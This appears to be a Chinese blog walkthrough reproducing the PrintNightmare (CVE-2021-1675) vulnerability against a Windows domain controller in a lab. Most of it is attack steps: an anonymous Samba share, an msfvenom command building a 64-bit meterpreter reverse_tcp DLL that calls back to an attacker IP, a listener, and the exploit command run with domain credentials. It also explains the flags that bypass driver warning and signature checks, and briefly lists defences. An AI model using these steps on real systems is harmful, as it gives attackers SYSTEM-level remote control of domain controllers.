cve-2021-1675复现

柔情只为你懂 2022-10-18 15:56 178阅读 0赞

### 文章目录 ###

*  1. 参考文章
 *  2. 环境配置
 *   *  2.1 samba配置
     *  2.2 特殊的impacket配置
 *  3. 漏洞复现
 *   *  3.1 使用msf生成恶意dll并开启监听
     *  3.2 上传恶意dll到共享文件夹内
     *  3.3 使用exp进行利用
 *  4. 利用成果：
 *  防御方法
 *  5. 原理

# 1. 参考文章 #

[CentOS7搭建Samba共享文件夹 设置无密码登录][CentOS7_Samba_]  
exp:  
[cube0x0/CVE-2021-1675][cube0x0_CVE-2021-1675]

# 2. 环境配置 #

## 2.1 samba配置 ##

需要有一台linux机器，配置可无密码访问的共享文件夹。  
下载samba：

sudo apt-get remove samba-common  
    sudo apt-get remove libwbclient0
    sudo apt-get install samba
    apt-get install samba-client
    yum install -y samba samba-client #centOS
    apt-get

下面为配置文件`/etc/samba/smb.conf`需要修改的地方：

[global]
        security=user
        map to guest = Bad User
        server role = standalone server
        usershare allow guests = yes
        idmap config * : backend = tdb
        smb ports = 445
    
    [test] 
    comment = share 
    path = /tmp/ 
    public = yes 
    browseable = yes 
    writable = yes 
    guest ok = yes 
    create mask = 0777 
    directory mask = 0775 
    guest ok = yes

## 2.2 特殊的impacket配置 ##

在攻击机上还需装`cube0x0`的impacket包，具体命令如下：

pip3 uninstall impacket
    git clone https://github.com/cube0x0/impacket
    cd impacket
    python3 ./setup.py install

# 3. 漏洞复现 #

条件：

1.  域内任意账户的用户名密码
2.  域控ip
3.  可被域控匿名访问的共享文件夹

## 3.1 使用msf生成恶意dll并开启监听 ##

`注意：只能使用64位的dll文件，否则会发现，dll可以上传但不会被执行`

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.1 LPORT=9999 -f dll -o y.dll
    
    handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.124.1 -P 9999

## 3.2 上传恶意dll到共享文件夹内 ##

scp y.dll root@192.168.124.7:/tmp/

## 3.3 使用exp进行利用 ##

其中test为域的名字，zhangsan:123分别是域控任意用户的账号密码，192.168.124.142是域控ip。 后面的\\192.168.124.7\\test\\y.dll为smb可访问的unc路径，也是共享文件的路径。

python3 CVE-2021-1675.py test/zhangsan:123@192.168.124.142  "\\\192.168.124.7\test\y.dll"

# 4. 利用成果： #

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]

# 防御方法 #

1.  关闭打印机服务
2.  在组策略中设置无法访问不需要认证的共享文件夹。

![在这里插入图片描述][20210708170529648.png]

# 5. 原理 #

整体大概是通过RpcAddPrinterDriverEx函数上传一个驱动，然后再用system权限加载这个驱动。

1.  RpcAddPrinterDriverEx `#绕过告警`  
    RpcAddPrinterDriverEx的第三个参数dwFileCopyFlags改为APD\_INSTALL\_WARNED\_DRIVER后，我们可以无视告警安装打印机驱动。
2.  ValidateDriverInfo `#绕过文件签名检查`  
    标志位设置为APD\_INSTALL\_WARNED\_DRIVER即可逃过检查。
3.  CreateInternalDriverFileArray `#绕过建立驱动文件目录函数`  
    在FileCopyFlags中设置APD\_COPY\_FROM\_DIRECTORY（0x10），即可跳过spool目录检查。
4.  修改dll文件版本号绕过驱动文件兼容性检查  
    可以修改待加载驱动或dll文件的版本号为3，从而绕过驱动兼容性检查。
5.  CopyFileToFinalDirectory `#加载驱动文件`  
    函数执行完成后，我们的驱动文件以及依赖就被复制到驱动目录了，复制后的驱动文件会被自动加载。

[CentOS7_Samba_]: https://www.huaweicloud.com/articles/092d785c07324c6783c4745ce68b82e8.html
[cube0x0_CVE-2021-1675]: https://github.com/cube0x0/CVE-2021-1675
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221005/2b7509c6777444c4850625ed3cb195ff.png
[20210708170529648.png]: /images/20221005/6b9efea43c1b48259df90c2417151898.png